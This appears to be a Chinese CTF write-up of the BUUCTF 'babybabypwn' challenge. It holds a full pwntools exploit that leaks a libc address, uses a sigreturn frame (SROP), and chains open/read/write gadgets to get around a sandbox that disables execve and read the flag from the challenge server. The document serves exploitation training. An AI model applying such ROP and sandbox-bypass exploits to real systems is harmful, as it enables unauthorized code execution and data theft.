文章图片
文章图片
文章图片
存在沙盒机制,禁用了execve,只能调用orw直接读flag了…
#! /usr/bin/python3
from pwn import *context(log_level='debug', arch='amd64')def debug_pause():
log.info(proc.pidof(p))
pause()proc_name = './vn_pwn_babybabypwn_1'
p = process(proc_name)
p = remote('node3.buuoj.cn', 29563)
elf = ELF(proc_name)
libc = ELF('./libc-2.23.so')p.recvuntil('gift: ')
puts_addr = int(p.recv(14), 16)
log.info(hex(puts_addr))
libc_base = puts_addr - libc.sym['puts']
open_addr = libc_base + libc.sym['open']
read_addr = libc_base + libc.sym['read']
write_addr = libc_base + libc.sym['write']
pop_rdi_ret = libc_base + 0x21102
pop_rsi_ret = libc_base + 0x202e8
pop_rdx_ret = libc_base + 0x01b92
bss_start = libc_base + libc.bss()
rop_addr = bss_start + 0x100frame = SigreturnFrame()
frame.rdi = 0x0
frame.rsi = rop_addr
frame.rdx = 0x100
frame.rip = read_addr
frame.rsp = rop_addrp.sendafter('message: ', bytes(frame)[8:])str_flag_addr = rop_addr + 0x98
payload = p64(pop_rdi_ret) + p64(str_flag_addr) + p64(pop_rsi_ret) + p64(0x0) + p64(open_addr) # open('flag')
payload += p64(pop_rdi_ret) + p64(0x3) + p64(pop_rsi_ret) + p64(bss_start) + p64(pop_rdx_ret) + p64(0x40) + p64(read_addr) # read
payload += p64(pop_rdi_ret) + p64(0x1) + p64(pop_rsi_ret) + p64(bss_start) + p64(pop_rdx_ret) + p64(0x40) + p64(write_addr) # write
payload += b'flag\x00'
p.send(payload)
p.interactive()
文章图片
【[V&N2020 公开赛]babybabypwn[srop]】SigreturnFrame参考:
http://docs.pwntools.com/en/latest/rop/srop.html?highlight=SigreturnFrame
srop原理参考:
https://www.freebuf.com/articles/network/87447.html
https://wiki.x10sec.org/pwn/stackoverflow/advanced_rop/#srop
推荐阅读
- ELF,PE文件格式 及 延迟绑定(PLT、GOT表)、动态链接(.dynamic段)
- babyheap_0ctf_2017
- BUUCTF|【BUUCTF - PWN】babyheap_0ctf_2017
- BUUCTF|【BUUCTF - PWN】babyrop
- buuctf中的一些pwn题总结(不断更新)
- pwn|关于沙箱关闭execve的绕过技巧及SROP的简单利用方法 --(buuctf[V&N2020 公开赛])babybabypwn + warmup
- 堆溢出|House of force —— gyctf_2020_force
- 栈溢出|非常规情况下栈溢出系统调用——PicoCTF_2018_can-you-gets-me
- 堆溢出|libc2.26以下的单一堆溢出漏洞利用——0ctf_2017_babyheap